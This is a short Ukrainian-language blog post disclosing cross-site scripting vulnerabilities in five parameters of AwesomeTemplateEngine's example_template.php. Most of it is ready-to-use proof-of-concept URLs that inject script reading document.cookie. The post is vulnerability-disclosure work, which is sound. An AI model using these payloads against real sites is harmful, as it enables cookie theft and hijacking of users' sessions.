Cross-Site Scripting уразливості в AwesomeTemplateEngine

23:51 02.01.2008

В жовтні, 31.10.2007, я знайшов Cross-Site Scripting уразливості в AwesomeTemplateEngine.

Уразливості в файлі example_template.php в параметрах data[title], data[message], data[table][1][item], data[table][1][url] та data[poweredby]. Атака можлива при включених register globals.

XSS:

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E


Leave a Reply

You must be logged in to post a comment.